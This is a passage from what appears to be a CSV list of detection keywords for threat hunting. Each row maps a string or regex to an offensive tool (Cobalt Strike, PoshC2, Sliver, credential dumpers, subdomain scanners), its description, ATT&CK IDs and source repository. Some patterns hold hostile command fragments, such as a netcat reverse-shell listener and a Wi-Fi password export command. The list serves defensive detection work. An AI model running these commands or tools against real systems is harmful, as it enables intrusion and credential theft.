- T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_server.exe*",".{0,1000}stinger_server\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*StompySharps.csproj*",".{0,1000}StompySharps\.csproj.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*StompySharps.exe*",".{0,1000}StompySharps\.exe.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*StompySharps.sln*",".{0,1000}StompySharps\.sln.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*stopdaisy*",".{0,1000}stopdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StopInveigh*",".{0,1000}StopInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-stop-keylogger*",".{0,1000}\-stop\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*stop-keystrokes*",".{0,1000}stop\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*stormshadow07*",".{0,1000}stormshadow07.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","10","913","174","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z" "*Stowaway/admin/process*",".{0,1000}Stowaway\/admin\/process.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*STRING firefox about:logins*",".{0,1000}STRING\sfirefox\sabout\:logins.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*string maliciousCommand =*",".{0,1000}string\smaliciousCommand\s\=.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*String netsh wlan export profile key=clear*",".{0,1000}String\snetsh\swlan\sexport\sprofile\skey\=clear.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*strip_bof.ps1*",".{0,1000}strip_bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*strip2john.py*",".{0,1000}strip2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*strip-bof -Path *",".{0,1000}strip\-bof\s\-Path\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*StrongLoader_x64.exe*",".{0,1000}StrongLoader_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*struct sockaddr_in revsockaddr*",".{0,1000}struct\ssockaddr_in\srevsockaddr.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*struts_ext_v2.jar*",".{0,1000}struts_ext_v2\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*stty raw -echo; (stty size; cat) | nc -lvnp*",".{0,1000}stty\sraw\s\-echo\;\s\(stty\ssize\;\scat\)\s\|\snc\s\-lvnp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*su rootz*",".{0,1000}su\srootz.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*subbrute*",".{0,1000}subbrute.{0,1000}","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3250","647","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" "*subdomain_takeovers.py*",".{0,1000}subdomain_takeovers\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*subdomain-enumeration.py*",".{0,1000}subdomain\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*subdomains-100.txt*",".{0,1000}subdomains\-100\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-1000.txt*",".{0,1000}subdomains\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-10000.txt*",".{0,1000}subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-500.txt*",".{0,1000}subdomains\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*subdomains-top1million-20000.txt*",".{0,1000}subdomains\-top1million\-20000\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*subdomains-uk-1000.txt*",".{0,1000}subdomains\-uk\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-uk-500.txt*",".{0,1000}subdomains\-uk\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomain-wordlist.txt*",".{0,1000}subdomain\-wordlist\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*subfinder -d *",".{0,1000}subfinder\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*subfinder -silent -d *",".{0,1000}subfinder\s\-silent\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*subfinder --silent*",".{0,1000}subfinder\s\-\-silent.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*subfinder*",".{0,1000}subfinder.{0,1000}","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","9361","1195","2024-04-30T17:27:06Z","2018-03-31T09:44:57Z" "*sublist3r -v -d *",".{0,1000}sublist3r\s\-v\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Sublist3r*",".{0,1000}Sublist3r.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","9257","2049","2024-01-30T20:29:45Z","2015-12-15T00:55:25Z" "*Suborner.exe*",".{0,1000}Suborner\.exe.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Suborner-master.zip*",".{0,1000}Suborner\-master\.zip.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*succesfully dumped WINHELLO pin.s to *",".{0,1000}succesfully\sdumped\sWINHELLO\spin\.s\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*Successfully cloned GPO * from SYSVOL*",".{0,1000}Successfully\scloned\sGPO\s.{0,1000}\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*Successfully connected to sliver listener*",".{0,1000}Successfully\sconnected\sto\ssliver\slistener.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Successfully connected* spawning shell?*",".{0,1000}Successfully\sconnected.{0,1000}\sspawning\sshell\?.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*Successfully cracked account password*",".{0,1000}Successfully\scracked\saccount\spassword.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Successfully deleted scheduled task *",".{0,1000}Successfully\sdeleted\sscheduled\stask\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*Successfully dumped SAM and SYSTEM*",".{0,1000}Successfully\sdumped\sSAM\sand\sSYSTEM.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*Successfully embedded EXE into GIF*",".{0,1000}Successfully\sembedded\sEXE\sinto\sGIF.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense 